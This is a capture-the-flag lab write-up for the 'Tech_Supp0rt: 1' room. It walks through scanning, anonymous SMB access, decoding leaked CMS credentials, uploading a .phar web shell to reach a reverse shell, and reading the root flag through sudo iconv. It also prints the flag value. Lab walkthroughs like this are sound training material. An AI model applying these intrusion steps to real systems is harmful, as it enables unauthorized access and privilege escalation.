Tech_Supp0rt: 1

by

Hack into the machine and investigate the target.
Please allow about 5 minutes for the machine to fully boot!
Note: The theme and security warnings encountered in this room are part of the challenge.

Nmap Scan

nmap 10.10.14.121 -sC -sV -p-

22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)

Gobuster – Web Directory Brute Force

gobuster dir -u http://10.10.14.121 -w /usr/share/wordlists/dirb/common.txt -x php,txt,HTML

/.php (Status: 403) [Size: 277]
/.htm (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 11321]
/.html (Status: 403) [Size: 277]
/wordpress (Status: 301) [Size: 316] [–> http://10.10.14.121/wordpress/]
/test (Status: 301) [Size: 311] [–> http://10.10.14.121/test/]

SMB was open, so I checked for anonymous access.

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
websvr Disk
IPC$ IPC IPC Service (TechSupport server (Samba, Ubuntu))

I connected to websvr and found enter.txt.

smbclient //10.10.14.121/websvr -N
enter.txt
get enter.txt

GOALS

1) Make fake popup and host it online on Digital Ocean server
2) Fix subrion site, /subrion doesn’t work, edit from panel
3) Edit WordPress website

IMP

Subrion creds
|-> admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
WordPress creds
|-> (missing)

I went to https://gchq.github.io/CyberChef and entered 7sKvntXdPEJaxazce9PXi24zaFrLiKWCk clicked on magic and it showed me that with base58 the password was Scam2021

So it looks like it is time to check out the Subrion, it looks like Subrion is an CMS site and the going to http://10.10.1.1/subrion really was broken. So I googled the default admin panel location and found it to be /panel

Heading to 10.10.111.111/subrion/panel brought me to the admin panel for Subrion. Using the credentials from earlier got me logged in. I found a place to upload files. I won’t go into details, but I have been fighting this part for a while. extensions of PHP did not work. I looked for other types and found that .phar worked. So I renamed my shell to shell.phar and headed to http://10.10.14.121/subrion/uploads/shell.phar, and sure enough, my Netcat listen woke up.

I had a low level Shell www-data

Checking sudo privileges:

sudo -l

Result:

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv

Abusing iconv to Read Root Flag

Since iconv can be run as root, I used it to read the root flag:

```bash
sudo iconv -f 8859_1 -t 8859_1 /root/root.txt

851b8233a8c09400ec30651bd1529bf1ed02790b